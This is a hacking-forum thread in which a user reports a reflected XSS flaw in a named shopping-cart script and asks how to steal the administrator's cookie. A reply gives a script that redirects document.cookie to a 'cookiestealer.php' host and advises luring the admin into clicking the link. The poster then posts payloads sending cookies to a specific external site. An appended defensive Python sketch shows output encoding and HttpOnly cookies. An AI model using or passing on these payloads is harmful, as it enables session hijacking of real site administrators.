Thursday, April 17, 2014
HellBound Hackers | Computer General | Web hacking

XSS help


Posted on 10-10-05 14:41
Hey guys, I just found out that Hassan Consulting's Shopping Cart Version 1.52 is vulnerable to XSS. I was just playing around when I got to this page that's like
Code
/cgi-local/shop.pl/page=



So I tried
Code
/cgi-local/shop.pl/page=<script>alert('XSS')</script>



and I got an alert box saying XSS.
So I was wondering if you guys could help me out a little bit, because I am not very familiar with XSS. How do I get the admin's cookie? I have a cookie stealer on my site.

And I was wondering if it's possible to view a file's content by doing
Code
/cgi-local/shop.pl/file=the directory of the files



And the alert box works with this too
Code
/cgi-local/shop.pl/file=<script>alert('XSS')</script>




Edited by on 10-10-05 14:42
RE: XSS help


Posted on 10-10-05 16:30
Well, you could use this script:

window.location="http://www.yourhost.com/cookiestealer.php?"+document.cookie

where cookiestealer.php takes address line input, like GET, and saves it to a log file.

Then, you just get an admin to click that link.


RE: XSS help


Posted on 10-10-05 16:46
OK, I'll try that, thanks a lot

EDIT: OK, I tried it but it doesn't work
Code
cgi-local/shop.pl/page=<script>window.location('http://projectx.t35.com/about.php?c='+ document.cookie</script>
and this
cgi-local/shop.pl/page=<script>window.location="http://projectx.t35.com/about.php?c="+document.cookie</script>



That's what I typed and nothing happens

Edited by on 10-10-05 16:59
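
An added example, not part of the thread and not the shopping cart's own code: a defender-side sketch of the two controls that address what the posts above describe, validating and HTML-encoding the value reflected from `page=`, and issuing the session cookie with `HttpOnly` so script cannot read it through `document.cookie`. The function names, the allow-list pattern and the cookie name `session` are assumptions.

```python
import html
import re
from http.cookies import SimpleCookie

# Assumption: legitimate page names are short identifiers with no markup.
PAGE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")

def extract_param(path_info, name):
    """Return the text after '/<name>=' in an already URL-decoded PATH_INFO."""
    marker = "/" + name + "="
    idx = path_info.find(marker)
    return None if idx < 0 else path_info[idx + len(marker):]

def render_page(path_info):
    """Return (status, body); the reflected value is validated, then encoded."""
    page = extract_param(path_info, "page")
    if page is None:
        return 400, "<p>Missing page</p>"
    # Encode on output in every branch, so markup is shown as text, never run.
    safe = html.escape(page, quote=True)
    if not PAGE_NAME.fullmatch(page):
        return 400, "<p>Unknown page: " + safe + "</p>"
    return 200, "<h1>" + safe + "</h1>"

def session_cookie_header(session_id):
    """Build a Set-Cookie value that page script cannot read or send cross-site."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["path"] = "/"
    cookie["session"]["httponly"] = True    # hidden from document.cookie
    cookie["session"]["secure"] = True      # sent over HTTPS only
    cookie["session"]["samesite"] = "Strict"
    return cookie["session"].OutputString()

if __name__ == "__main__":
    # Constructed inputs: the thread's own test string and a normal page name.
    for path in ("/page=<script>alert('XSS')</script>", "/page=checkout"):
        print(path, "->", render_page(path))
    print("Set-Cookie:", session_cookie_header("constructed-session-id"))
```
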